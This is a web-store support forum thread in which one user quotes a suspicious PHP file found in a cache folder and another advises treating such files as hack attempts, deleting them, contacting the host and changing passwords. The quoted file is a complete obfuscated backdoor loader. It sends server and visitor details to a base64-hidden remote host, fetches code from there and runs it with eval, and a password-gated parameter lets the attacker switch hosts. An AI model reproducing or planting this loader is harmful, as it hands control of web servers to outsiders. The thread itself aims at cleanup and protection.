Quote Originally Posted by gee38l View Post
There is another file called: 81431.php

Code:
<? error_reporting(0);$a=(isset($_SERVER["HTTP_HOST"])?$_SERVER["HTTP_HOST"]:$HTTP_HOST);$b=(isset($_SERVER["SERVER_NAME"])?$_SERVER["SERVER_NAME"]:$SERVER_NAME);$c=(isset($_SERVER["REQUEST_URI"])?$_SERVER["REQUEST_URI"]:$REQUEST_URI);$d=(isset($_SERVER["PHP_SELF"])?$_SERVER["PHP_SELF"]:$PHP_SELF);$e=(isset($_SERVER["QUERY_STRING"])?$_SERVER["QUERY_STRING"]:$QUERY_STRING);$f=(isset($_SERVER["HTTP_REFERER"])?$_SERVER["HTTP_REFERER"]:$HTTP_REFERER);$g=(isset($_SERVER["HTTP_USER_AGENT"])?$_SERVER["HTTP_USER_AGENT"]:$HTTP_USER_AGENT);$h=(isset($_SERVER["REMOTE_ADDR"])?$_SERVER["REMOTE_ADDR"]:$REMOTE_ADDR);$i=(isset($_SERVER["SCRIPT_FILENAME"])?$_SERVER["SCRIPT_FILENAME"]:$SCRIPT_FILENAME);$j=(isset($_SERVER["HTTP_ACCEPT_LANGUAGE"])?$_SERVER["HTTP_ACCEPT_LANGUAGE"]:$HTTP_ACCEPT_LANGUAGE);$z="/?".base64_encode($a).".".base64_encode($b).".".base64_encode($c).".".base64_encode($d).".".base64_encode($e).".".base64_encode($f).".".base64_encode($g).".".base64_encode($h).".e.".base64_encode($i).".".base64_encode($j);$f=base64_decode("cnNzbmV3cy53cw==");if (basename($c)==basename($i)&&isset($_REQUEST["q"])&&md5($_REQUEST["q"])=="1c9c141af20b84fdd184f973d11cd773") $f=$_REQUEST["id"];if((include(base64_decode("aHR0cDovL2Fkcy4=").$f.$z)));else if($c=file_get_contents(base64_decode("aHR0cDovLzcu").$f.$z))eval($c);else{$cu=curl_init(base64_decode("aHR0cDovLzcxLg==").$f.$z);curl_setopt($cu,CURLOPT_RETURNTRANSFER,1);$o=curl_exec($cu);curl_close($cu);eval($o);};die(); ?>
In the BMZ_CACHE folder i have alot of folders a - f and 0 - 9 i looked thorugh every folder and it seems that most of them had a few php files similar to the two above.....

ok, this is what another software told me when I got some of those in our forum files...cause usually they have some kind of redirection in them or links ...they can get in by way of a disguised config file ...hence the search for any php files that do not belong in with the image files or vice versa. so make sure you inspect all those files cause they are hack attempts.

What have you installed recently into your store ... check the zips that you got cause unless you did not manually install the items and someone else does your installing then those were put up there by a would be hacker.

The other software told me that anyfile with numbers like that, which you do not install yourself are indeed a hack attempt either by the contributor (which I am fairyly certain this place does not allow or it would go the way of the dinos very fast) or by someone hacking the server files.

It is best to find out for certain, then download them all and delete them from the server...do this regardless.

Then keep an eye out to see if they reoccur. Talk to your host about these files also and please, change your password to get into the server files and the admin section.